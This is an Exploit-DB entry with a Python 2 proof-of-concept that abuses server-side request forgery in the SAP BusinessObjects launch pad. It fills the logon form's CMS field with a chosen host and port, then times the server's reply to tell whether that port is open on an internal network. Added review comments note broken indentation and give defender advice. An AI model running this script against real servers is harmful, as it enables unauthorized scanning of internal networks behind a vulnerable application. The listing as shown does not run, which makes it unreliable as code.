SAP BusinessObjects launch pad – Server-Side Request Forgery

  • 作者: Ahmad Mahfouz
    日期: 2017-12-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43404/
  • # Exploit Title: SAP BusinessObjects launch pad SSRF
    # Date: 2017-11-8
    # Exploit Author: Ahmad Mahfouz
    # Category: Webapps
    # Author Homepage: www.unixawy.com
    # Description: Design Error in SAP BusinessObjects launch pad leads to SSRF attack 
    
     
    #!/usr/bin/env python
    # SAP BusinessObjects launch pad SSRF Timing Attack Port scan
    # usage : sblpta.py http://path.faces targetIP targetPort
    #
    # Proof-of-concept for the SSRF described in the header: the logon form's
    # CMS field is filled with a caller-chosen host:port, and the time the
    # server takes to answer the logon POST is used to infer whether that port
    # is open (the application is presumably waiting on its own connection
    # attempt to the CMS address). Python 2 only (print statements, urllib2).
    # NOTE(review): several indented bodies below (lines after `if`/`else`)
    # lost their indentation in rendering, so this listing does not run as-is;
    # it is kept byte-identical here.
    import urllib2
    import urllib
    import ssl
    from datetime import datetime
    import sys
    
     
    
    # Exactly three positional arguments: launch-pad URL, target host, target port.
    if len(sys.argv) != 4:
    
     print "Usage: python sblpta.py http://path.faces targetIP targetPort"
     sys.exit(1)
    
    url = sys.argv[1]
    targetIP = sys.argv[2]
    targetPort = sys.argv[3]
    # The value that ends up in the CMS form field (see formdata below).
    targetHostIP = "%s:%s" %(targetIP,targetPort)
    print "\r\n" 
    print "[*] SAP BusinessObjects Timing Attack"
    headers = {'User-Agent': 'Mozilla/5.0'}
    # NOTE(review): a bare SSLContext does no certificate verification by
    # default, and PROTOCOL_TLSv1 pins the client to TLS 1.0.
    gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    
    # First request: fetch the logon page to obtain a session cookie and the
    # JSF view-state value the form requires.
    try:
    
     request = urllib2.Request(url, headers=headers)
     page = urllib2.urlopen(request, context=gcontext)
     print "[*] Connected to SAP Bussiness Object %s"%url
    
    # Bare except: any failure (including KeyboardInterrupt) is reported as a
    # connection problem.
    except:
    
     print "[-] Failed To connect to SAP Bussiness Object %s" %url
     print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
     sys.exit(2)
    
     
    resheaders = page.info()
    # Raises KeyError if the response carried no Set-Cookie header.
    cookie = resheaders.dict['set-cookie']
    content = page.readlines()
    
    # Scan the page source for the com.sun.faces.VIEW hidden field and pull
    # its value out of the line. sfview is only bound inside the `if` branch,
    # so when no line matches, the `if not sfview` check below raises
    # NameError instead of printing its message.
    for line in content:
    
     if "com.sun.faces.VIEW" in line:
    sfview = line.split("=")[4].split("\"")[1]
    print "[*] Got java faces dynamic value"
    
     else:
    continue
    
    if not sfview:
    
     print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
     sys.exit(3)
    
    
    # Logon form with empty credentials; the CMS field is the SSRF sink.
    # Defender note: server-side, the logon handler should only accept CMS
    # hosts from its configured cluster; for detection, logon POSTs whose
    # `_id0:logon:CMS` names a host outside the known CMS list (with empty
    # credentials, as here) are the signal to alert on.
    formdata = {"_id0:logon:CMS":targetHostIP,
     "_id0:logon:USERNAME":"",
     "_id0:logon:PASSWORD":"",
     "com.sun.faces.VIEW":sfview,
     "_id0":"_id0"
     }
    
     
    
    data_encode = urllib.urlencode(formdata)
    # Wall-clock timing around the POST is the whole measurement.
    start =datetime.now()
    print "[*] Testing Timing Attack %s" %start
    request = urllib2.Request(url,data_encode)
    request.add_header('Cookie', cookie)
    # NOTE(review): unlike the first request, this one is opened without
    # gcontext, so it uses urllib2's default TLS handling.
    response= urllib2.urlopen(request)
    end = datetime.now()
    the_page = response.read()
    
    
    # The script treats an "FWM" marker in the reply as the logon-failure path
    # and "FWC" as an expired session (per the messages below). A round trip
    # of 10 s or more is read as the back end having hung on an open port; a
    # short server-side CMS connect timeout plus a CMS host allowlist removes
    # this signal entirely.
    if "FWM" in the_page:
     
     elapsedTime = end-start
     if elapsedTime.total_seconds() >= 10:
    
    print "[*] Port %s is Open, Gotcha !!! " %targetPort
    
     else:
    
    print "[*] Port %s is Closed , we die fast"%targetPort
    
    elif "FWC" in the_page:
    
     print "[-] error login expired"
     sys.exit(10)